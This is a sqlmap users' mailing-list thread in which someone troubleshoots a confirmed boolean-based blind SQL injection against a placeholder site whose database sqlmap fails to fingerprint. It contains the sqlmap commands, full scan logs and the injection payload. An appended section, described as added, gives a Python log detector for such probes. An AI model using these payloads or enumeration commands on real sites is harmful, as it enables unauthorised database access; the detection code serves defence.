Probably has something to do with this.
[16:38:17] [WARNING] HTTP error codes detected during testing:
400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
Did you try the tamper scripts?
On 15.12.2012 at 17:10, Volker Nebelung <volker.nebel...@rwth-aachen.de> wrote:
Hi,
I am using sqlmap to scan a specific GET parameter of a target site. I know
there is a SQL injection in parameter 2:
python sqlmap.py -u "http://example.net/de/de*/site" --batch
sqlmap gives me the following result:
…
[16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be
injectable (possible DBMS: Microsoft Access)
[16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
[16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE
or HAVING clause' injectable
[16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS
could be Microsoft Access. Do you want to skip test payloads specific for
other DBMSes? [Y/n] Y
[16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:36:29] [INFO] automatically extending ranges for UNION query injection
technique tests as there is at least one other potential injection
technique found
[16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is
a false positive
[16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep
testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s)
requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
---
[16:37:11] [INFO] testing Microsoft Access
[16:37:13] [INFO] confirming Microsoft Access
[16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
[16:37:14] [INFO] testing MySQL
[16:37:16] [WARNING] the back-end DBMS is not MySQL
[16:37:16] [INFO] testing Oracle
[16:37:17] [WARNING] the back-end DBMS is not Oracle
[16:37:17] [INFO] testing PostgreSQL
[16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
[16:37:18] [INFO] testing Microsoft SQL Server
[16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:37:19] [INFO] testing SQLite
[16:37:20] [WARNING] the back-end DBMS is not SQLite
[16:37:20] [INFO] testing Firebird
[16:37:21] [WARNING] the back-end DBMS is not Firebird
[16:37:21] [INFO] testing SAP MaxDB
[16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
[16:37:22] [INFO] testing Sybase
[16:37:23] [WARNING] the back-end DBMS is not Sybase
[16:37:23] [INFO] testing IBM DB2
[16:37:24] [WARNING] the back-end DBMS is not IBM DB2
[16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end
database management system, but from the HTML error page it was possible to
determinate that the back-end DBMS is Microsoft Access. Do not specify the
back-end DBMS manually, sqlmap will fingerprint the DBMS for you
[16:37:24] [WARNING] HTTP error codes detected during testing:
400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
[*] shutting down at 16:37:24
I am confused at this point: Is sqlmap thinking that the DBMS is MS Access
or not?
When I manually try the following URL in my browser,
"http://example.net/de/de'/site", I get a 500 HTML page with the output
"Microsoft JET Database Engine Error …", so I would say the DBMS is MS
Access.
When I now try to get, for example, all tables, the following happens:
python sqlmap.py -u "example.net/de/de*/site" --batch --tables
sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 16:38:02
[16:38:05] [INFO] custom injection marking character ('*') found in option
'-u'. Do you want to process it? [Y/n/q] Y
[16:38:05] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
---
[16:38:07] [INFO] testing MySQL
[16:38:08] [INFO] heuristics detected web page charset 'ascii'
[16:38:08] [WARNING] the back-end DBMS is not MySQL
[16:38:08] [INFO] testing Oracle
[16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:38:09] [WARNING] the back-end DBMS is not Oracle
[16:38:09] [INFO] testing PostgreSQL
[16:38:10] [WARNING] reflective value(s) found and filtering out
[16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
[16:38:10] [INFO] testing Microsoft SQL Server
[16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:38:11] [INFO] testing SQLite
[16:38:12] [WARNING] the back-end DBMS is not SQLite
[16:38:12] [INFO] testing Microsoft Access
[16:38:12] [INFO] confirming Microsoft Access
[16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
[16:38:13] [INFO] testing Firebird
[16:38:14] [WARNING] the back-end DBMS is not Firebird
[16:38:14] [INFO] testing SAP MaxDB
[16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
[16:38:15] [INFO] testing Sybase
[16:38:16] [WARNING] the back-end DBMS is not Sybase
[16:38:16] [INFO] testing IBM DB2
[16:38:17] [WARNING] the back-end DBMS is not IBM DB2
[16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end
database management system. Support for this DBMS will be implemented at
some point
[16:38:17] [WARNING] HTTP error codes detected during testing:
400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
[*] shutting down at 16:38:17
Even when I try to use the --text-only or --not-string switches, I am not able
to receive the tables. Any ideas?
Best regards
Volker Nebelung
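For the server side of a scan like the one in this thread, an added example that is not part of the original messages: a small access-log check that flags clients sending the boolean-comparison pattern seen in the reported payload together with the 400/500 responses the tool itself warns about. The log format (common log format), the sample lines, the threshold and the function name `scan` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines (common log format); the client addresses are
# documentation-range placeholders, not values from the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Dec/2012:16:36:20 +0100] "GET /de/de/site HTTP/1.1" 200 5120
198.51.100.7 - - [15/Dec/2012:16:36:21 +0100] "GET /de/de'/site HTTP/1.1" 500 1208
198.51.100.7 - - [15/Dec/2012:16:36:22 +0100] "GET /de/de'%20AND%209199=9199%20AND%20'tyFW'='tyFW/site HTTP/1.1" 200 5120
198.51.100.7 - - [15/Dec/2012:16:36:23 +0100] "GET /de/de'%20AND%209199=4821%20AND%20'tyFW'='tyFW/site HTTP/1.1" 500 1208
203.0.113.9 - - [15/Dec/2012:16:36:24 +0100] "GET /de/de/site HTTP/1.1" 200 5120
203.0.113.9 - - [15/Dec/2012:16:36:30 +0100] "GET /de/missing HTTP/1.1" 404 312
"""

# client address, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
# "AND <number>=<number>" comparison inside the request path
NUM_CMP = re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.IGNORECASE)
# 'abc'='abc where the application is expected to supply the closing quote
STR_CMP = re.compile(r"'(\w+)'\s*=\s*'\1")


def scan(log_text, error_threshold=2):
    """Return {client: {"probes": [...], "errors": n}} for clients that sent
    comparison payloads in the path AND drew at least error_threshold
    400/500 responses (the two codes named in the tool's own warning)."""
    per_ip = defaultdict(lambda: {"probes": [], "errors": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable request line
        ip, raw_path, status = m.group(1), m.group(2), int(m.group(3))
        path = unquote(raw_path)  # payloads normally arrive percent-encoded
        if NUM_CMP.search(path) or STR_CMP.search(path):
            per_ip[ip]["probes"].append(path)
        if status in (400, 500):
            per_ip[ip]["errors"] += 1
    return {ip: s for ip, s in per_ip.items()
            if s["probes"] and s["errors"] >= error_threshold}


if __name__ == "__main__":
    for ip, stats in scan(SAMPLE_LOG).items():
        print(ip, stats["errors"], "errors;", len(stats["probes"]), "probe requests")
```

Requiring both signals keeps a single malformed link or an ordinary 404 from raising an alert.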
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users